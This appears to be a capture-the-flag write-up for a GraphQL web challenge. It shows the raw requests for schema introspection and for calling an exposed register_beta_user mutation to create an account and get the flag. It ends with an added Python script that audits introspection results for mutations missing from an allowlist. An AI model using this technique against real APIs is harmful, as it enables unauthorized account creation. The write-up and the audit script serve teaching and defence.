When logging in, the web app sends a POST request to the `/graphql` endpoint containing a mutation query.
```HTTP
POST /graphql HTTP/2
Host: flagcoin.ctf.glacierctf.com
Content-Type: application/json

{"query":"\n mutation($username: String!, $password: String!) { \n login(username: $username, password: $password) { \n username \n } \n }\n ","variables":{"username":"teststyle","password":"teststyle"}}
```
Using a GraphQL introspection query, we can pull all of the available fields to query:
```JSON
{"query":"{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}
```
Response (excerpt):
```JSON
{"name":"register_beta_user","description":null,"args":[{"name":"username","description":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"defaultValue":null},{"name":"password","description":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"defaultValue":null}
```
The schema exposes a `register_beta_user` mutation. Replacing `login` with `register_beta_user` in the login request creates a valid user, which we can then log in as to get the flag.
```HTTP
POST /graphql HTTP/2
Host: flagcoin.ctf.glacierctf.com
Content-Type: application/json

{"query":"\n mutation($username: String!, $password: String!) { \n register_beta_user(username: $username, password: $password) { \n username \n } \n }\n ","variables":{"username":"teststyle","password":"teststyle"}}
```
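A defender-side check for the exposure described above, as an added example that is not part of the original writeup: it reads an introspection result and reports every mutation that is not on an allowlist of operations the public client actually uses. The sample data is constructed; the `Mutation` type name and the argument types given for `login` are assumptions.

```python
# Added example: audit an introspection result for mutations the public
# client never calls (here, anything other than `login`).
STRING = {"kind": "SCALAR", "name": "String", "ofType": None}

def _field(name, arg_type):
    # Helper for building the constructed sample below.
    return {"name": name, "args": [{"name": "username", "type": arg_type},
                                    {"name": "password", "type": arg_type}]}

# Constructed sample shaped like a response to the introspection query.
# Only the field names `login` and `register_beta_user` come from the page.
SAMPLE = {"data": {"__schema": {
    "mutationType": {"name": "Mutation"},
    "types": [
        {"kind": "OBJECT", "name": "Mutation", "fields": [
            _field("login", {"kind": "NON_NULL", "name": None, "ofType": STRING}),
            _field("register_beta_user", STRING)]},
        {"kind": "SCALAR", "name": "String", "fields": None},
    ]}}}

def type_str(ref):
    """Render a TypeRef (nested ofType chain) in SDL form, e.g. String!"""
    if ref["kind"] == "NON_NULL":
        return type_str(ref["ofType"]) + "!"
    if ref["kind"] == "LIST":
        return "[" + type_str(ref["ofType"]) + "]"
    return ref["name"]

def mutations(result):
    """Map each mutation field name to {argument name: type}."""
    schema = result["data"]["__schema"]
    root = schema.get("mutationType")
    if not root:  # schema defines no mutation root
        return {}
    by_name = {t["name"]: t for t in schema["types"]}
    fields = by_name[root["name"]].get("fields") or []
    return {f["name"]: {a["name"]: type_str(a["type"]) for a in f["args"]}
            for f in fields}

def unexpected_mutations(result, allowlist):
    """Mutations visible through introspection but absent from the allowlist."""
    return {n: a for n, a in mutations(result).items() if n not in allowlist}

if __name__ == "__main__":
    for name, args in unexpected_mutations(SAMPLE, {"login"}).items():
        sig = ", ".join(f"{k}: {v}" for k, v in args.items())
        print(f"review authorization for mutation {name}({sig})")
```

Each mutation it reports needs its own server-side authorization check; disabling introspection alone only hides the name.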
---
Tags: #ctf #graphql #web #api